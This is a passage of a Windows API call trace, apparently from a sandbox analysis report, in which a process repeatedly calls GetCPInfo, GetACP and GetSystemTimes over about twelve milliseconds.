returned 1 [0130.684] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.684] GetACP () returned 0x4e4 [0130.684] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.684] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.684] GetACP () returned 0x4e4 [0130.684] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.684] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.684] GetACP () returned 0x4e4 [0130.684] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.684] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.684] GetACP () returned 0x4e4 [0130.684] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.684] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.684] GetACP () returned 0x4e4 [0130.684] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.684] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.684] GetACP () returned 0x4e4 [0130.684] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.684] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.684] GetACP () returned 0x4e4 [0130.684] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.685] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.685] GetACP () returned 0x4e4 [0130.685] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.685] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.685] GetACP () returned 0x4e4 [0130.685] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.685] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.685] GetACP () returned 0x4e4 [0130.685] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.685] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.685] GetACP () returned 0x4e4 [0130.685] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.686] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.686] GetACP () returned 0x4e4 [0130.686] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.686] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.686] GetACP () returned 0x4e4 [0130.686] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.686] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.686] GetACP () returned 0x4e4 [0130.686] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.686] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.686] GetACP () returned 0x4e4 [0130.686] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.686] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.686] GetACP () returned 0x4e4 [0130.686] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.686] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.686] GetACP () returned 0x4e4 [0130.686] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.686] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.687] GetACP () returned 0x4e4 [0130.687] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.687] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.687] GetACP () returned 0x4e4 [0130.687] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.687] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.687] GetACP () returned 0x4e4 [0130.687] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.687] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.687] GetACP () returned 0x4e4 [0130.687] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.687] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.687] GetACP () returned 0x4e4 [0130.687] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.687] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.687] GetACP () returned 0x4e4 [0130.687] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.687] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.687] GetACP () returned 0x4e4 [0130.687] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.688] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.688] GetACP () returned 0x4e4 [0130.688] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.688] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.688] GetACP () returned 0x4e4 [0130.688] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.688] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.688] GetACP () returned 0x4e4 [0130.688] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.688] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.688] GetACP () returned 0x4e4 [0130.688] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.688] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.688] GetACP () returned 0x4e4 [0130.688] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.688] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.688] GetACP () returned 0x4e4 [0130.688] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.688] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.689] GetACP () returned 0x4e4 [0130.689] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.689] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.689] GetACP () returned 0x4e4 [0130.689] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.689] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.689] GetACP () returned 0x4e4 [0130.689] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.689] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.689] GetACP () returned 0x4e4 [0130.689] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.689] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.689] GetACP () returned 0x4e4 [0130.689] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.689] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.689] GetACP () returned 0x4e4 [0130.689] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.689] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.689] GetACP () returned 0x4e4 [0130.689] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.690] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.690] GetACP () returned 0x4e4 [0130.690] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.690] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.690] GetACP () returned 0x4e4 [0130.690] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.690] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.690] GetACP () returned 0x4e4 [0130.690] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.690] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.690] GetACP () returned 0x4e4 [0130.690] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.690] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.690] GetACP () returned 0x4e4 [0130.690] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.690] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.690] GetACP () returned 0x4e4 [0130.690] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.690] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.691] GetACP () returned 0x4e4 [0130.691] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.691] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.691] GetACP () returned 0x4e4 [0130.691] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.691] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.691] GetACP () returned 0x4e4 [0130.691] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.691] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.691] GetACP () returned 0x4e4 [0130.691] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.691] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.691] GetACP () returned 0x4e4 [0130.691] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.691] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.691] GetACP () returned 0x4e4 [0130.691] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.691] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.691] GetACP () returned 0x4e4 [0130.691] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.692] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.692] GetACP () returned 0x4e4 [0130.692] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.692] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.692] GetACP () returned 0x4e4 [0130.692] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.692] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.692] GetACP () returned 0x4e4 [0130.692] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.692] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.692] GetACP () returned 0x4e4 [0130.692] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.692] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.692] GetACP () returned 0x4e4 [0130.692] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.692] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.692] GetACP () returned 0x4e4 [0130.692] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.692] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.692] GetACP () returned 0x4e4 [0130.693] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.693] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.693] GetACP () returned 0x4e4 [0130.693] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.693] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.693] GetACP () returned 0x4e4 [0130.693] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.693] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.693] GetACP () returned 0x4e4 [0130.693] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.693] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.693] GetACP () returned 0x4e4 [0130.693] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.693] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.693] GetACP () returned 0x4e4 [0130.693] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.693] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.693] GetACP () returned 0x4e4 [0130.693] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.694] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.694] GetACP () returned 0x4e4 [0130.694] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.694] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.694] GetACP () returned 0x4e4 [0130.694] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.694] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.694] GetACP () returned 0x4e4 [0130.694] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.694] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.694] GetACP () returned 0x4e4 [0130.694] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.694] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.694] GetACP () returned 0x4e4 [0130.694] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.694] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.694] GetACP () returned 0x4e4 [0130.694] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.694] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.695] GetACP () returned 0x4e4 [0130.695] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.695] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.695] GetACP () returned 0x4e4 [0130.695] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.695] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.695] GetACP () returned 0x4e4 [0130.695] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.695] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.695] GetACP () returned 0x4e4 [0130.695] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.695] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.695] GetACP () returned 0x4e4 [0130.695] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.695] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.695] GetACP () returned 0x4e4 [0130.695] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.695] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.695] GetACP () returned 0x4e4 [0130.695] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.696] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.696] GetACP () returned 0x4e4 [0130.696] GetSystemTimes 